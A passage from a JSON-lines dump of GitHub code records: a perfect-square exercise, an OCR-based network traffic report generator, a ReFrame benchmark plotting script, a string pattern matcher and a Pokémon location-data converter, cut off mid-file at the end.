)\n","repo_name":"micypac/bookmark-social","sub_path":"images/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14084163901","text":"'''Complete the findNextSquare method that finds the next integral perfect square after the one passed as a parameter.\nIf the parameter is itself not a perfect square then -1 should be returned. You may assume the parameter is positive.'''\n\nimport math\n\n\ndef find_next_square(sq):\n number = int(math.sqrt(sq))\n if number**2 != sq:\n return -1\n else:\n return (number+1)**2\n\n\ndef alternative_next_square(sq):\n return (int(math.sqrt(sq)) + 1)**2 if int(math.sqrt(sq))**2 == sq else -1\n\nprint(find_next_square(144))\nprint(find_next_square(123445))\n\nprint(alternative_next_square(16))\nprint(alternative_next_square(66))\n\n","repo_name":"EvaChitul/python_national","sub_path":"Own projects/next_perfect_square.py","file_name":"next_perfect_square.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24845137609","text":"# coding:utf-8\r\n'''\r\n@author: Sam_Shen\r\n@file: make_traffic_report.py\r\n@time: 2019/10/11 15:22\r\n@desc:\r\n\r\n需求:自动化生成流量报告\r\n\r\n自定义:\r\n1) 开始时间datestart\r\n2) 结束时间dateend\r\n3) 9.30上的url\r\n\r\n实现效果:\r\n1) 爬取SVR上的流量图片\r\n2) 图像识别流量数值分析top5(部分识别有误的需人工干预)\r\n3) 流量图和top5导入word模板后生成docx\r\n\r\n2019.10.10 更新功能:\r\n1) 图像打开,手动点击获取截图像素点坐标\r\n2) 更新机器识别流量值的判定机制\r\n\r\n2019.10.11 更新功能:\r\n1) 进行了tesserocr的训练\r\n2) 修正没有日期对应url的bug\r\n'''\r\n\r\n\r\nimport datetime\r\nimport os\r\nimport re\r\nimport requests\r\nfrom docx import Document\r\nfrom docx.shared import Inches\r\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\r\nfrom docx.shared import Pt\r\nfrom docx.oxml.ns import qn\r\nfrom PIL import Image\r\nimport tesserocr\r\nimport psutil\r\nimport operator\r\nimport cv2\r\nimport numpy as np\r\n\r\nclass Report:\r\n def __init__(self):\r\n self.base_url = \"http://172.20.9.30/20191011/graph_10346.html\"\r\n self.base_dir = os.path.dirname(os.path.abspath(__file__))\r\n self.img_dir = os.path.join(self.base_dir, 'img')\r\n self.template_dir = os.path.join(self.base_dir,'template')\r\n\r\n # 以下需根据要求手动调整\r\n self.Paging = 3 # 正文显示: 几个流量图分页\r\n self.date_start = \"20190901\" # 开始时间\r\n self.date_end = \"20190930\" # 结束时间\r\n\r\n\r\n # 一些初始化工作\r\n def preparation(self):\r\n # 没有img目录就创建目录,有img目录则清空目录下的文件\r\n if not os.path.isdir(self.img_dir):\r\n os.mkdir(self.img_dir)\r\n else:\r\n for root, dirs, files in os.walk(self.img_dir, topdown=False):\r\n if files:\r\n for name in files:\r\n os.remove(os.path.join(root, name))\r\n\r\n if not os.path.isfile(os.path.join(self.template_dir,\"model.docx\")):\r\n print('未在本地发现template目录或model.docx模板文件,请检查.')\r\n exit(1)\r\n\r\n\r\n # 转换url\r\n # http://172.20.9.30/20190720/graph_12377.html 转换成 http://172.20.9.30/12377/graphs/graph_12377_1.png\r\n def trans_url(self):\r\n base_url_list = re.split('[/_.]', self.base_url)\r\n pic_id = base_url_list[-2]\r\n pic_date = base_url_list[-4]\r\n pic_url = \"http://172.20.9.30/%s/graphs/graph_%s_1.png\" % (pic_date,pic_id)\r\n return pic_url\r\n\r\n\r\n # 生成日期列表\r\n def create_assist_date(self):\r\n # 转为日期格式\r\n datestart = datetime.datetime.strptime(self.date_start,'%Y%m%d')\r\n dateend = datetime.datetime.strptime(self.date_end,'%Y%m%d')\r\n date_list = []\r\n date_list.append(datestart.strftime('%Y%m%d'))\r\n while datestart < dateend:\r\n # 日期叠加一天\r\n datestart += datetime.timedelta(days=+1)\r\n # 日期转字符串存入列表\r\n date_list.append(datestart.strftime('%Y%m%d'))\r\n return date_list\r\n\r\n\r\n # 生成图片url列表\r\n def create_pic_url(self):\r\n date_key = pic_url.split('/')[3]\r\n pic_list = []\r\n for date_str in date_list:\r\n ''' pic_dict = {'date': '20190901', 'url': 'http://172.20.9.30/20190902/graphs/graph_12328_1.png'} '''\r\n pic_dict = {}\r\n date_obj = datetime.datetime.strptime(date_str, '%Y%m%d')\r\n date_obj += datetime.timedelta(days=+1)\r\n date_add = date_obj.strftime(\"%Y%m%d\")\r\n new_url = pic_url.replace(date_key, date_add)\r\n pic_dict[\"date\"] = date_str\r\n pic_dict[\"url\"] = new_url\r\n pic_list.append(pic_dict)\r\n return pic_list\r\n\r\n\r\n # 下载图片\r\n def download_pic(self):\r\n for each in pic_list:\r\n res = requests.get(each['url'])\r\n if res.status_code == 200:\r\n img = res.content\r\n img_name = os.path.join(self.img_dir,each['date']+'.png')\r\n with open(img_name,'wb' ) as f:\r\n f.write(img)\r\n\r\n\r\n # 获取需要图片截图所需的像素点坐标\r\n def get_pixel_coordinate(self):\r\n img_file = os.path.join(self.img_dir,self.date_start+'.png')\r\n img = cv2.imdecode(np.fromfile(img_file, dtype=np.uint8), cv2.IMREAD_UNCHANGED)\r\n a = []\r\n b = []\r\n\r\n def on_EVENT_LBUTTONDOWN(event, x, y, flags, param):\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n xy = \"%d,%d\" % (x, y)\r\n a.append(x)\r\n b.append(y)\r\n cv2.circle(img, (x, y), 1, (255, 0, 0), thickness=-1)\r\n cv2.putText(img, xy, (x, y), cv2.FONT_HERSHEY_PLAIN, 1.0, (0, 0, 0), thickness=1)\r\n cv2.imshow(\"image\", img)\r\n\r\n h, w, l = img.shape\r\n cv2.namedWindow(\"image\", cv2.WINDOW_NORMAL)\r\n cv2.resizeWindow(\"image\", w * 2, h * 2)\r\n try:\r\n cv2.setMouseCallback(\"image\", on_EVENT_LBUTTONDOWN)\r\n cv2.imshow(\"image\", img)\r\n cv2.waitKey(0)\r\n box = (a[0], b[0], a[1], b[1])\r\n return box\r\n except IndexError as e:\r\n print(e,\"未在图片上选择任何坐标点\")\r\n exit(1)\r\n\r\n\r\n # 识别图片中的最大流量,部分识别有误的需人工干预\r\n def realize_traffic(self):\r\n traffic_list = []\r\n\r\n # 关闭打开图片的process\r\n def close_photo():\r\n for proc in psutil.process_iter():\r\n if proc.name() == \"Microsoft.Photos.exe\":\r\n proc.kill()\r\n\r\n # 判断机器识别流量精准度,返回False为识别错误需要人工干预\r\n def judge_traffic(val):\r\n val = val.replace(\" \", \"\")\r\n\r\n # 如果首位不为数字\r\n if val[0].isdigit() == False:\r\n # print('首位不为数字')\r\n return False\r\n\r\n # 如果末位没有单位\r\n if val[-1] not in [\"G\", \"M\", \"k\"]:\r\n # print('末位没有单位或单位错误')\r\n return False\r\n\r\n # 如果末2位为.\r\n if val[-2] in [\".\"]:\r\n # print('末2位为.')\r\n return False\r\n\r\n # 如果每个切片单位为数字或为.\r\n sum = 0\r\n for i in val[:-1]:\r\n if i.isdigit():\r\n pass\r\n elif i in [\".\"]:\r\n pass\r\n else:\r\n # print('切片单位不为数字或.')\r\n sum += 1\r\n\r\n if sum == 0:\r\n return True\r\n elif sum >= 1:\r\n return False\r\n\r\n\r\n for root, dirs, files in os.walk(self.img_dir, topdown=False):\r\n for name in files:\r\n traffic_dict = {}\r\n img_files = os.path.join(root, name)\r\n img = Image.open(img_files)\r\n\r\n # 设置图像裁剪区域 (x左上,y左上,x右下,y右下)\r\n # box = (530, 228, 610, 250)\r\n\r\n # 图像裁剪\r\n image = img.crop(box)\r\n image = image.convert(\"L\")\r\n w, h = image.size\r\n image = image.resize((w * 2, h * 2))\r\n\r\n # 图像二值化\r\n threshold = 180\r\n table = []\r\n for i in range(256):\r\n if i < threshold:\r\n table.append(0)\r\n else:\r\n table.append(1)\r\n image = image.point(table, '1')\r\n\r\n traffic_dict['filename'] = name\r\n traffic = tesserocr.image_to_text(image,lang=\"num\").strip('\\n')\r\n print(traffic)\r\n\r\n # 人工干预识别图像\r\n if not judge_traffic(traffic):\r\n image.show()\r\n traffic = input('File %s machine realize is %s,input normal traffic: ' % (name, traffic))\r\n close_photo()\r\n\r\n traffic_dict['traffic'] = traffic.replace(\" \", \"\").upper()\r\n traffic_list.append(traffic_dict)\r\n return traffic_list\r\n\r\n\r\n # 根据图片分析top5\r\n def calc_top5(self):\r\n traffic_list_update = []\r\n\r\n for each in traffic_list:\r\n traffic_dict = {}\r\n traffic_dict['filename'] = each[\"filename\"]\r\n\r\n traffic = each[\"traffic\"]\r\n if traffic[-1:] in [\"G\", \"g\"]:\r\n traffic_val = float(traffic[:-1]) * 1000 * 1000\r\n if traffic[-1:] in [\"M\", \"m\"]:\r\n traffic_val = float(traffic[:-1]) * 1000\r\n if traffic[-1:] in [\"K\", \"k\"]:\r\n traffic_val = float(traffic[:-1])\r\n traffic_dict['traffic_val'] = traffic_val\r\n traffic_dict['traffic_show'] = traffic\r\n traffic_list_update.append(traffic_dict)\r\n\r\n sorted_x = sorted(traffic_list_update, key=operator.itemgetter('traffic_val'), reverse=True)\r\n top5 = sorted_x[0:5]\r\n\r\n '''\r\n [{'filename': '20190906.png', 'traffic_val': 203540.0, 'traffic_show': '203.54M'}, \r\n {'filename': '20190907.png', 'traffic_val': 186640.0, 'traffic_show': '186.64M'}, \r\n {'filename': '20190908.png', 'traffic_val': 177610.0, 'traffic_show': '177.61M'}, \r\n {'filename': '20190909.png', 'traffic_val': 172100.0, 'traffic_show': '172.10M'},\r\n {'filename': '20190912.png', 'traffic_val': 166520.0, 'traffic_show': '166.52M'}\r\n ]\r\n '''\r\n return top5\r\n\r\n\r\n # 生成word\r\n def create_docx(self):\r\n document = Document(os.path.join(self.template_dir,\"model.docx\"))\r\n\r\n def datestr_format(date_str):\r\n date_obj = datetime.datetime.strptime(date_str, '%Y%m%d')\r\n date_str_format = date_obj.strftime(\"%Y/%m/%d\")\r\n return date_str_format\r\n\r\n # 添加Top5标题\r\n date_start_str = datestr_format(self.date_start)\r\n date_end_str = datestr_format(self.date_end)\r\n top5_title = \"%s - %s Top5\" % (date_start_str, date_end_str)\r\n document.add_heading(top5_title, 0)\r\n\r\n # 添加top5表格信息\r\n table = document.add_table(rows=1, cols=3)\r\n table.style = 'Light List Accent 5'\r\n hdr_cells = table.rows[0].cells\r\n hdr_cells[0].text = '日期'\r\n hdr_cells[1].text = '流量图'\r\n hdr_cells[2].text = '最大值'\r\n\r\n for each in top5:\r\n row_cells = table.add_row().cells\r\n row_cells[0].text = str(each['filename'].strip('.png'))\r\n\r\n # 单元格里添加图片\r\n paragraph = row_cells[1].paragraphs[0]\r\n run = paragraph.add_run()\r\n run.add_picture(os.path.join(self.img_dir,each['filename']), width=Inches(3))\r\n\r\n row_cells[2].text = str(each['traffic_show'])\r\n\r\n document.add_page_break() # 添加换页符\r\n\r\n # 添加正文标题\r\n daily_title = \"%s - %s Traffic Daily\" % (date_start_str, date_end_str)\r\n document.add_heading(daily_title, 0)\r\n\r\n # 设置正文字体格式\r\n document.styles['Normal'].font.name = u'Arial Unicode MS'\r\n document.styles['Normal']._element.rPr.rFonts.set(qn('w:eastAsia'), u'Arial Unicode MS')\r\n document.styles['Normal'].font.size = Pt(12)\r\n\r\n # docx文件添加时间内容和图片\r\n def insert_content(date_title, img_files):\r\n # 添加时间\r\n p = document.add_paragraph(date_title)\r\n p.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\r\n\r\n # 添加图片\r\n # 检查图片文件是否存在,存在添加不存在则写入文件不存在\r\n if os.path.exists(img_files):\r\n paragraph = document.add_paragraph()\r\n paragraph.alignment = WD_ALIGN_PARAGRAPH.CENTER\r\n run = paragraph.add_run(\"\")\r\n run.add_picture(img_files, width=Inches(5.5))\r\n else:\r\n p = document.add_paragraph('图片404错误未找到')\r\n p.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\r\n\r\n # 添加换行符\r\n # p = document.add_paragraph('\\n')\r\n\r\n num = 0\r\n for each in date_list:\r\n name = each+'.png'\r\n img_files = os.path.join(self.img_dir,name)\r\n\r\n for each in traffic_list:\r\n if name == each['filename']:\r\n each_traffic = each['traffic']\r\n\r\n date_title = datestr_format(name.split('.')[0]) + \" - \" + each_traffic\r\n\r\n num += 1\r\n\r\n # 设定每*个图表为一页\r\n if num % self.Paging != 0:\r\n insert_content(date_title, img_files)\r\n\r\n else:\r\n insert_content(date_title, img_files)\r\n document.add_page_break() # 添加换页符\r\n\r\n # 保存文件\r\n new_report = \"model_\" + datetime.datetime.now().strftime('%Y%m%d_%H%M%S') + \".docx\"\r\n document.save(new_report)\r\n\r\n\r\n'''生成2019年9月数据'''\r\nreport = Report()\r\n\r\nreport.preparation()\r\npic_url = report.trans_url()\r\ndate_list = report.create_assist_date()\r\npic_list = report.create_pic_url()\r\nreport.download_pic()\r\nbox = report.get_pixel_coordinate()\r\ntraffic_list = report.realize_traffic()\r\ntop5 = report.calc_top5()\r\nreport.create_docx()","repo_name":"coolsmz/make_traffic_report","sub_path":"make_traffic_report_v5.py","file_name":"make_traffic_report_v5.py","file_ext":"py","file_size_in_byte":13528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23770727297","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n\nimport json\nimport numpy as np\nimport matplotlib.pyplot as plt\n# import sys\n# import re\nfrom decimal import Decimal\n\n\ndef May2021_read_reframe_json_and_return_dict():\n # --- read data from reframe json report\n # f = open('run-report_cuda.json')\n f = open('/tmp/0/json/pilatus_weak.json')\n d = json.load(f)\n f.close()\n\n # --- construct dict for plotly:\n # my_data['cn:np_per_c:func_name': func_seconds]\n my_data = {}\n for myjob in d['runs'][0]['testcases']:\n if myjob['result'] == 'success':\n job_stdout = myjob['job_stdout']\n for myfunc in range(0, 14):\n # 0 Elapsed # 1 _Elapsed\n # 2 domain_sync # 8 IAD\n # 3 updateTasks # 9 MomentumEnergyIAD\n # 4 FindNeighbors # 10 Timestep\n # 5 Density # 11 UpdateQuantities\n # 6 EquationOfState # 12 EnergyConservation\n # 7 mpi_synchronizeHalos # 13 UpdateSmoothingLength\n cn = job_stdout.split('_')[5]\n np_per_c = f\"{Decimal(job_stdout.split('_')[6]):.1E}\"\n func_name = myjob['perfvars'][myfunc]['name']\n my_key = f'{cn}:{np_per_c}:{func_name}'\n func_seconds = myjob['perfvars'][myfunc]['value']\n # print(my_key, func_seconds)\n my_data[my_key] = func_seconds\n\n return my_data\n\n\ndef May2021_create_xdata_for_plot(my_data):\n # get dict and format it for plotly x_data\n # https://plotly.com/python/horizontal-bar-charts/\n # -> Color Palette for Bar Chart\n my_func_idx = 0\n mylist = []\n x_data = []\n for kk in my_data.keys():\n cn = kk.split(':')[0]\n # np_per_c = kk.split(':')[1]\n # func_name = kk.split(':')[2]\n # 2:1.0E+6:UpdateSmoothingLength 0.2407\n if my_func_idx > 1 and cn == '1':\n mylist.append(my_data[kk])\n my_func_idx += 1\n if my_func_idx == 14:\n my_func_idx = 0\n x_data.append(mylist)\n mylist = []\n\n return x_data\n\n\ndef list2percentages(ll):\n # convert each element of the list to its % value\n # res_l = []\n # total = sum(ll)\n # print(ll)\n # for seconds in ll:\n # print(seconds)\n # ll[0] = round(seconds / total, 5)\n\n ll = np.true_divide(ll, sum(ll))\n # ll = np.true_divide(ll, ll.sum(axis=1, keepdims=True))\n return ll * 100\n\n\ndef May2021_plot_mydata_as_pctg_hbar(my_data):\n \"\"\"\n copied from:\n https://matplotlib.org/stable/gallery/lines_bars_and_markers/\n horizontal_barchart_distribution.html\n #sphx-glr-gallery-lines-bars-and-markers-horizontal-barchart-distribution-py\n \"\"\"\n\n category_names = ['domain_sync', 'updateTasks', 'FindNeighbors', 'Density',\n 'EquationOfState', 'mpi_synchronizeHalos', 'IAD',\n 'MomentumEnergyIAD', 'Timestep', 'UpdateQuantities',\n 'EnergyConservation', 'UpdateSmoothingLength']\n\n results = {\n '$10^4$': my_data[0],\n '$10^5$': my_data[1],\n '$10^6$': my_data[2],\n }\n # 2 domain_sync\n # 3 updateTasks\n # 4 FindNeighbors\n # 5 Density\n # 6 EquationOfState\n # 7 mpi_synchronizeHalos\n # 8 IAD\n # 9 MomentumEnergyIAD\n # 10 Timestep\n # 11 UpdateQuantities\n # 12 EnergyConservation\n # 13 UpdateSmoothingLength\n\n def survey(results, category_names):\n \"\"\"\n Parameters\n ----------\n results : dict\n A mapping from question labels to a list of answers per category.\n It is assumed all lists contain the same number of entries and that\n it matches the length of *category_names*.\n category_names : list of str\n The category labels.\n \"\"\"\n labels = list(results.keys())\n data = np.array(list(results.values()))\n data_cum = data.cumsum(axis=1)\n category_colors = plt.get_cmap('RdYlGn')(\n np.linspace(0.15, 0.85, data.shape[1]))\n\n fig, ax = plt.subplots(figsize=(9.2, 5))\n ax.invert_yaxis()\n ax.xaxis.set_visible(False)\n ax.set_xlim(0, np.sum(data, axis=1).max())\n\n for i, (colname, color) in enumerate(zip(category_names,\n category_colors)):\n widths = data[:, i]\n starts = data_cum[:, i] - widths\n rects = ax.barh(labels, widths, left=starts, height=0.5,\n label=colname, color=color)\n r, g, b, _ = color\n # text_color = 'black'\n # {{{ jg ax.text -------------------------------------------------\n if min(widths) > 2:\n # fmtjg = f'{int(bar_label)}:%}'\n ax.bar_label(rects, label_type='center', color='black',\n fmt='%d%%')\n # --- adding func_name to bar_label\n for rr in rects:\n # print(rr, type(rr))\n # Rectangle(xy=(0, -0.25), width=5.6, height=0.5, angle=0)\n # Rectangle(xy=(0, 0.75), width=17.9, height=0.5, angle=0)\n # ax.text(0+(10/2)-(1*10/2), -.25+0.5, category_names[0],\n # ------> x\n # | x0,y0 x1,y0 ...\n # | x0,y1 x1,y1 ...\n # | x0,y2 x1,y2 ...\n # y\n x_text = rr.xy[0] # + rr.width / 4\n y_text = rr.xy[1] + rr._height\n ax.text(x_text, y_text, colname, rotation=-45)\n # fontsize=8)\n\n # text_color = '' if min(widths) < 2 else 'black'\n # # text_color = 'white' if r * g * b < 0.5 else 'darkgrey'\n # ax.bar_label(rects, label_type='center', color=text_color)\n # }}} ------------------------------------------------------------\n # ax.legend(ncol=len(category_names), bbox_to_anchor=(0, 1),\n ax.legend(ncol=4, bbox_to_anchor=(0, 1),\n loc='lower left', fontsize='small')\n\n return fig, ax\n\n survey(results, category_names)\n plt.show()\n\n\n# ----------------------------------------------------------------------------\n# elapsed timings (seconds, %) for each sph function call as a bar plot\n# https://matplotlib.org/stable/gallery/lines_bars_and_markers/\n# horizontal_barchart_distribution.html\nif __name__ == \"__main__\":\n my_data = May2021_read_reframe_json_and_return_dict()\n x_data = May2021_create_xdata_for_plot(my_data)\n print(x_data)\n\n # --- convert seconds (x_data) to % (x_data_percents):\n # --- not needed? (matplotlib does it)\n x_data_percents = []\n for ii in x_data:\n if ii:\n x_data_percents.append(np.round(list2percentages(ii), 1).tolist())\n # x_data_percents = list2percentages(ii)\n # print(\"#\", np.round(x_data_percents, 2).tolist())\n\n print(x_data_percents)\n May2021_plot_mydata_as_pctg_hbar(x_data_percents)\n # for i in newl: print(i)\n # for i in x_data[2]: print(i)\n","repo_name":"jgphpc/jgphpc","sub_path":"python/matplotlib/reframe37_jg.py","file_name":"reframe37_jg.py","file_ext":"py","file_size_in_byte":7145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"37118512681","text":"def match(str, pat, dict, i=0, j=0):\n\tn = len(str)\n\tm = len(pat)\n\tif n < m:\n\t\treturn False\n\tif i == n and j == m:\n\t\treturn True\n\tif i == n or j == m:\n\t\treturn False\n\tcurr = pat[j]\n\tif curr in dict:\n\t\ts = dict[curr]\n\t\tk = len(s)\n\t\tif i + k < len(str):\n\t\t\tss = str[i:i + k]\n\t\telse:\n\t\t\tss = str[i:]\n\t\tif ss != s:\n\t\t\treturn False\n\t\treturn match(str, pat, dict, i + k, j + 1)\n\tfor k in range(1, n - i + 1):\n\t\tdict[curr] = str[i:i + k]\n\t\tif match(str, pat, dict, i + k, j + 1):\n\t\t\treturn True\n\t\tdict.pop(curr)\n\treturn False\n\ndef pattern_detector(a,b):\n\tdict = {} \n\tif match(a, b, dict):\n\t\treturn \"Yes\"\n\telse:\n\t return \"No\"\n\ndef main():\n k = input()\n res = []\n for i in range(int(k)):\n a = input()\n b = input()\n res.append(pattern_detector(a,b))\n for i in res:\n print(i)\n\n\nmain()\n\n\n","repo_name":"NavidDehban/Pattern-Detection","sub_path":"Pattern detection.py","file_name":"Pattern detection.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20861914631","text":"import glob\nimport os\nimport sys\nimport re\nfrom pyuca import Collator\n\nroot_path = \"D:/Poképédia/Robot\"\nif len(sys.argv) > 1:\n\troot_path = sys.argv[1]\n\nprint(\"Python root_path [\"+root_path+\"]\")\n\nos.chdir(root_path)\n\nc = Collator()\n\nfoldername = \"dumps/locdump/\"\nseen_games = set()\nlocations = {}\nwarnings = \"\"\n\ngame_to_game_long = {\n\t\"RV\":\t\t\t\"Pokémon Rouge et Vert\",\n\t\"B-JP\":\t\t\t\"Pokémon Bleu (Japon)\",\n\t\"RB\":\t\t\t\"Pokémon Rouge et Bleu\",\n\t\"J\":\t\t\t\"Pokémon Jaune\",\n\t\"O\":\t\t\t\"Pokémon Or\",\n\t\"A\":\t\t\t\"Pokémon Argent\",\n\t\"OA\":\t\t\t\"Pokémon Or et Argent\",\n\t\"C\":\t\t\t\"Pokémon Cristal\",\n\t\"RS\":\t\t\t\"Pokémon Rubis et Saphir\",\n\t\"RFVF\":\t\t\t\"Pokémon Rouge Feu et Vert Feuille\",\n\t\"E\":\t\t\t\"Pokémon Émeraude\",\n\t\"DP\":\t\t\t\"Pokémon Diamant et Perle\",\n\t\"HGSS\":\t\t\t\"Pokémon Or HeartGold et Argent SoulSilver\",\n\t\"Pt\":\t\t\t\"Pokémon Platine\",\n\t\"NB\":\t\t\t\"Pokémon Noir et Blanc\",\n\t\"NB2\":\t\t\t\"Pokémon Noir 2 et Blanc 2\",\n\t\"XY\":\t\t\t\"Pokémon X et Y\",\n\t# \"Démo-ROSA\":\t\"Pokémon Rubis Oméga et Saphir Alpha _ Version démo spéciale\",\n\t\"ROSA\":\t\t\t\"Pokémon Rubis Oméga et Saphir Alpha\",\n\t\"SL\":\t\t\t\"Pokémon Soleil et Lune\",\n\t\"USUL\":\t\t\t\"Pokémon Ultra-Soleil et Ultra-Lune\",\n\t\"LGPE\":\t\t\t\"Pokémon Let's Go, Pikachu et Let's Go, Évoli\",\n\t\"EB\":\t\t\t\"Pokémon Épée et Bouclier\",\n\t\"DEPS\":\t\t\t\"Pokémon Diamant Étincelant et Perle Scintillante\",\n\t\"LPA\":\t\t\t\"Légendes Pokémon _ Arceus\",\n\t\"EV\":\t\t\t\"Pokémon Écarlate et Violet\"\n}\n\ndef get_savepath(game):\n\ttry:\n\t\treturn \"dumps/locdump_converted/\" + game_to_game_long[game] + \".txt\"\n\texcept KeyError:\n\t\treturn None\n\n# Directory cleaning\ndirectory = \"dumps/locdump_converted/\"\ntry:\n\tif not os.path.exists(directory):\n\t\tos.makedirs(directory)\n\telse:\n\t\tfiles = [glob.glob(directory + \"*.txt\", recursive=True)]\n\n\t\tfor d in files:\n\t\t\tfor f in d:\n\t\t\t\ttry:\n\t\t\t\t\tos.remove(f)\n\t\t\t\texcept OSError as e:\n\t\t\t \t\tprint(\"Error: %s : %s\" % (f, e.strerror))\n\nexcept OSError as e:\n\tprint(e.strerror)\n\nprint(\"Parsing locations...\")\n\nfilenames = sorted(os.listdir(foldername), key=str.casefold)\nfor filename in filenames:\n\tfile = open(foldername + filename, \"r\", encoding=\"utf-8\")\n\n\tlocation = filename[:-4] \t#get rid of the '.txt'\n\t\n\t# print(\"Parsing \" + location + \"...\")\n\n\tlines = file.readlines()\n\tans = \"\"\n\tmilieu = None\n\tstarted = False\n\tstarted_raid = False\n\tfirst_line = True\n\tinfo_dict_dict = {}\n\n\tfor line in lines:\n\t\tif not started and not started_raid:\n\t\t\tif \"{{#invoke:Tableau Pokémon|sauvage\" in line:\n\t\t\t\tgame_parameter = \"|jeu=\"\n\t\t\t\tlocation_parameter = \"|lieu=\"\n\t\t\t\tzone_parameter = \"|zone=\"\n\t\t\t\tbeg = line.find(game_parameter)\n\t\t\t\tend = line.find(\"|\", beg + 1)\n\t\t\t\tgame = line[beg + len(game_parameter):end]\n\n\t\t\t\tbeg = line.find(location_parameter)\n\t\t\t\tif beg == -1:\n\t\t\t\t\tlocation_specified = location\n\t\t\t\telse:\n\t\t\t\t\tend = line.find(\"|\", beg + 1)\n\t\t\t\t\tlocation_specified = location + \"|\" + line[beg + len(location_parameter):end]\n\n\t\t\t\tbeg = line.find(zone_parameter)\n\t\t\t\tif beg == -1:\n\t\t\t\t\tzone = None\n\t\t\t\telse:\n\t\t\t\t\tend = line.find(\"|\", beg + 1)\n\t\t\t\t\tzone = line[beg + len(zone_parameter):end]\n\n\t\t\t\tstarted = True\n\n\t\t\t\tsavepath = get_savepath(game)\n\n\t\t\t\tif not savepath is None:\n\t\t\t\t\tif not game in seen_games:\n\t\t\t\t\t\tfile = open(savepath, \"w+\", encoding=\"utf-8\")\n\t\t\t\t\t\tseen_games.add(game)\n\n\t\t\t\t\t\tsavefile = open(savepath, \"a\", encoding=\"utf-8\") #use \"a\" mode to append text\n\t\t\t\t\t\tsavefile.write(\"return {\\n\")\n\t\t\t\t\t\tsavefile.close()\n\t\t\t\t\telse:\n\t\t\t\t\t\tans = \",\\n\"\n\n\t\t\t\tif zone is None:\n\t\t\t\t\tzone_add_on = \"\"\n\t\t\t\telse:\n\t\t\t\t\tzone_add_on = \"@\" + zone\n\n\t\t\t\tlocation_full = location_specified + zone_add_on\n\t\t\t\tans = ans + '\\t[\"' + location_full + '\"] = {\\n'\n\n\t\t\t\tif game in locations:\n\t\t\t\t\tlocation_game = locations[game]\n\t\t\t\t\tif location_full in location_game:\n\t\t\t\t\t\twarnings = warnings + \"\\nWARNING: \" + location + \" is present multiple times.\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tlocation_game.append(location_full)\n\t\t\t\telse:\n\t\t\t\t\tlocations[game] = [location_full]\n\n\t\t\telif \"{{#invoke:Tableau Pokémon|antre\" in line:\n\t\t\t\tgame = \"EB\"\n\t\t\t\tstarted_raid = True\n\t\t\t\tzone = None\n\t\t\t\tsavepath = get_savepath(game)\n\n\t\t\t\tif not savepath is None:\n\t\t\t\t\tif not game in seen_games:\n\t\t\t\t\t\tseen_games.add(game)\n\n\t\t\t\t\t\tsavefile = open(savepath, \"a\", encoding=\"utf-8\") #use \"a\" mode to append text\n\t\t\t\t\t\tsavefile.write(\"return {\\n\")\n\t\t\t\t\t\tsavefile.close()\n\t\t\t\t\telse:\n\t\t\t\t\t\tans = \",\\n\"\n\n\n\t\t\t\tans = ans + '\\t[\"' + location + '\"] = {\\n'\n\n\t\t\telif \"{{#invoke:Tableau Pokémon|teracristal\" in line:\n\t\t\t\tgame = \"EV\"\n\t\t\t\tstarted_raid = True\n\t\t\t\tzone = None\n\t\t\t\tsavepath = get_savepath(game)\n\n\t\t\t\tif not savepath is None:\n\t\t\t\t\tif not game in seen_games:\n\t\t\t\t\t\tfile = open(savepath, \"w+\", encoding=\"utf-8\")\n\t\t\t\t\t\tseen_games.add(game)\n\n\t\t\t\t\t\tsavefile = open(savepath, \"a\", encoding=\"utf-8\") #use \"a\" mode to append text\n\t\t\t\t\t\tsavefile.write(\"return {\\n\")\n\t\t\t\t\t\tsavefile.close()\n\t\t\t\t\telse:\n\t\t\t\t\t\tans = \",\\n\"\n\n\n\t\t\t\tans = ans + '\\t[\"' + location + '\"] = {\\n'\n\n\t\t\tcontinue\n\t\t\t\n\n\t\tif (\" / \" in line or line[-1] == \"/\") and not \"nowiki\" in line:\n\t\t\tspecial_info = re.search(r\"taux-journée\\([^\\(]*\\)\", line)\n\t\t\tif not special_info is None:\n\t\t\t\tspecial_info = special_info.group()\n\t\t\t\tspecial_value = special_info[:-1].replace(\"taux-journée(\", \"\")\n\t\t\t\tline = line.replace(special_info, \"taux-matin(\" + special_value + \") taux-jour(\" + special_value + \")\")\n\n\t\t\tl = line.split(\"/\")\n\t\t\tpokemon = l[0].strip() #erasing an eventual last space at the end\n\t\t\tpokemon_set = set(pokemon.split(\", \"))\n\t\t\ti = 1\n\n\t\t\tfor i in range(1, len(l)):\n\t\t\t\tinfo_dict = {}\n\t\t\t\tpokemon_called_list = []\n\t\t\t\tpokemon_called_rate_list = []\n\t\t\t\tpokemon_tmp_set = list(pokemon_set)\n\t\t\t\tpokemon_tmp_set.sort()\n\n\t\t\t\tif not milieu is None:\n\t\t\t\t\tinfo_dict[\"milieu\"] = milieu\n\n\t\t\t\tinfo = re.search(r\"[^\\s]*\\[[^\\]]*\\]\", l[i])\n\t\t\t\tif not info is None:\n\t\t\t\t\tinfo_point = info.group()\n\t\t\t\t\tinfo_type = re.search(r\"[^\\[]*\", info_point).group()\n\t\t\t\t\tif not '(' in info_type:\n\t\t\t\t\t\tinfo_info = re.search(r\"\\[[^\\]]*\\]\", info_point).group()[1:-1]\n\n\t\t\t\t\t\tinfo_dict[info_type] = info_info\n\t\t\t\t\t\t# print(info_type, \"|\", info_info)\n\n\t\t\t\t\t\tif info_type == \"renfort\":\n\t\t\t\t\t\t\tpokemon_called_list = info_info.split(\", \")\n\n\t\t\t\t\t\tl[i] = l[i][:info.span()[0]] + l[i][info.span()[1]:] \t# erase the data we just 